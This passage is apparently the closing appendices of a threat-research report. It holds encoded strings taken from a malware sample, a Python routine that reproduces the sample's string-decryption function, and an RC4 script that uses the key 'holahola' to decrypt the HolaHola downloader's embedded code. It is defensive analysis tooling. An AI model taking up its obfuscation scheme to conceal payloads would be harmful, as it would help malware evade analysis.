'JPIRIREPKJINEQJQCQARBQERDQAPJMIPJPKRBQARCRDODRAPGPJPKMCPHRJRDQAJHODPKPHPJNFQHPHQBQANBQEQGQANARIPKPJNKRARDQEQJQJRCMCPHRJRDQAJHMJPKQEQIQCMKQAPHRFQBQCPKPKMBPIRIREPKJIODRAPGRCPKMCQKRERBJINIRFRDPHQIREMBRARDRCJHNFQHPHQBQAMIPHRCQAMHPKPJRCPKRDRCMCQKRERBJINHQKPGPKPKRCMKPHRDPHMBRARDRCJHOBRBQKPIQARCRDOAPHRBPHQHQARDQARBRDMBRARDRCJHOEREPIODRJRCREPKQIMKPHRDPHMBRARDRCJHOBRBQKPIQARCRDNDQAPGRAMBRARDRCJHNCPGRDRDOBPKPINHQKPIQGMBRARDRCJHNCPGRDRDOBPKPINHQKPIQGOCQKREREQDQJPKMCQKRERBJINBPHRCREOAQAPHOGQIQHQJPJQFODQJRFRDQEQIQAMBPKRGQKRBPKJHNBQIRGQDRCQJQJQHQAQIREOFRAPJPHRDQAMJQKREQJRDMCQKRERBJINGQARBQJPKQHMJPHQGQHPHPHPIQGOEPHPHQHPKMCQKRERBJINARGPKQJRDNIQJQCODQAPIREQDQKQIMCQKRERBJINARGPKQJRDNIQJQCMBRARDRCJHNCRBQAPKNIQDRDRDMCPJRHQJRCPJJIOEQHRCNBRHRAPGQJRCQEQJQJMJQKREQJRDQARBMCQKRERBJIOEQHRCMJQDREQHPHQKMCPJRHQJRCPJJIOEQHRCMJQDREQHPHQKMJQDRERCPBLDPDMBRARDRCJHODPKPHPJOAQIQHRIOEQCPHRBQAPJNJPKQIQJRCRIMJPGRDPKMCQKRERBJIOCQAPGPKNKQJQGRJODQDPGRCPKPKNIQAQHQKRBRJNDQAPGRAMBRARDRCJHODPKPHPJOAQIQHRIOERDPHRDQEPIOEPKRCRFQARBNAPGREPGMCQKRERBJIMHQJRCQEMJQKPJQAOAPHQBQAMKPHRDPHMBRARDRCJHOAPKQIMJQKPJQAOAPHQBQAMKPHRDPHMBRARDRCJHOGQIQEPIQKPJQAMJPHRCQAOEPHPHQHPKNAPGREPGMCPJRHQJRCPJJINJRFQHPIPKRCNKQBOARCQJPJPKRDRCQKRBRDMBPKRGQKRBPKJHNKRDNDQGQKPHPHQGNCQGPHQBMCPHRJRDQAJHOEQKPHRBQALDPBLFPDMBQEQIRELHLGJHMKRBQERDQEPIPHQGOEPKPJRDQEQJQJOEQEQHQAQJRFRDMCPJRHQJRCPJJINDQAPGRAODQAQBQIPKQJRDODPKRDPKRCRFQAMBPKRGQKRBPKJHNEPKPHQKOEPKQCQHQAQIREMJQKQHQIQDREMBPKRGQKRBPKJHNEPKPHQKNAPKMKQJQIQHQERDOFQJREPGQHNBRCPKQAOEQDRBQARCQDQJQHPJMCPJRHQJRCPJJINDQAPGRAMKQAMJQKQHQIQDRENBRCPKQAMIQHQJPJQFOFQCRCPKRDQCQKQGPKMBPKRGQKRBPKJHNKREQIPHQARBOAQANEPKPHQKRDMBPKRGQKRBPKJHNJPGRIQDQIREQINJRFQHPIPKRCNKQBNDQAPGRARCMCQKRERBJIOARCQJPJPKRDRCNEPKPHQKRDMBRARDRCJHNDPJQEODQDPGRCPKPKNDPHQIPKQGQAOEPHPHQHPKMCQKRERBJIOARCQJPJPKRDRCOERDPHRBREPKRCNDQAQGRAPKRCMBRARDRCJHNDPJQEMKMKMHRERDRCQDPIREREPKNIQDRDRDMCQKRERBJINHQKPGPKPKRCNHQKPIQGMBPKRGQKRBPKJHOAODNJPGQFQJRCOGQARBRDQDQKQIMCPJRHQJRCPJJINKOENIQEQIQKRBOHPKRCRCQEQJQJMBPKRGQKRBPKJHOAODMJREQEQGPKNJRFQHPIPKRCMBPKRGQKRBPKJHOAODOBQGPHRDQBQJRCQHNFPJMCPJRHQJRCPJJINEQIPGQCPKOEREPIODRJRCREPKQIMBPKRGQKRBPKJHNFQHPHQBQAODRFPHOERIRDRDQAQHNJPGQFQJRCOGQARBRDQDQKQIMCPJRHQJRCPJJINEQIPGQCPKOEREPIODRJRCREPKQINIQEQIQKRBOHPKRCRCQEQJQJMBPKRGQKRBPKJHNDPJQENDPHQIPKQGQAMIRFQAQBPKRCPALFLFPDMBPKRGQKRBPKJHOBQJRDRDOBRBQKPIQARCRDNEQJQDREOCQKREREQDQJPKMCPJRHQJRCPJJIOEQHRCNBRHRAPGQJRCQEQJQJMIQERDQIPGRAMBPIRIREPKJIOEQHRCNBRHRAPGQJRCQEQJQJMIQERDQIPGRAMIQERDRDPALDLDLKPCMCPJRHQJRCPJJIODQARCRDQDQKQINFPJ', 'SHRJMJBJGJFHJJBJSJFHIJEJDJSJEJTJS', 'WHHIJIBILHVGXIKIGHTHUILIKGVHUIFIGIKIQ', 'ZHJHCHQHLHDHJFHFFFCHBHKHJ', 'XHMHYIAHV', 'YGSHIHWHQHNHRHFHXHJGNHWHSHHHIHXHW', 'UIOIGIUIJISIK', 'VIDIVIOIQID', 'TJGJLIRJDJEGEIRJDJE','XGEHNHOICHPIDIEGRHQGHHYIEIDIJGTHYHTHXIF','[GHHAHSGYGDGZFYGYGVGXGZHJHL', 'ZGCHKG[HEHDFVG[HQHD', 'NKMMDNGLOKIMAKCMHLLMBMA']

def decrypt_string(enc_string):
    """Replicates btudt's J() routine: the first character is the key and
    every following pair of letters ('A'-based digits) encodes one character."""
    dec_string = ''
    key = ord(enc_string[0])
    itr = 1
    for x in range(1, len(enc_string) - 1, 2):
        val1 = ord(enc_string[x]) - 65       # high digit of the pair
        val2 = ord(enc_string[x + 1]) - 65   # low digit of the pair
        # Combine the pair with the key, then drop 1 from every odd position.
        dec_string += chr((val1 * (key - 63) + val2 - key) - (itr % 2))
        itr += 1
    return dec_string


if __name__ == '__main__':
    for string in strings:
        print(decrypt_string(string), end='\n\n')

Appendix 2 – HolaHola RC4 Decryption Script

import sys
from arc4 import ARC4  # pip install arc4

# The hex-encoded blob extracted from the executable is not reproduced here;
# save it to a file and pass the file name on the command line.
data = open(sys.argv[1]).read().strip()

cipher = ARC4(b'holahola')  # RC4 key used by the HolaHola downloader
plain_code = cipher.decrypt(bytes.fromhex(data))

print(plain_code)

Thank you to Igal Lytzki, Perception Point Threat Analyst & IR Team Lead, @Merlax, and others for their research on the subject.

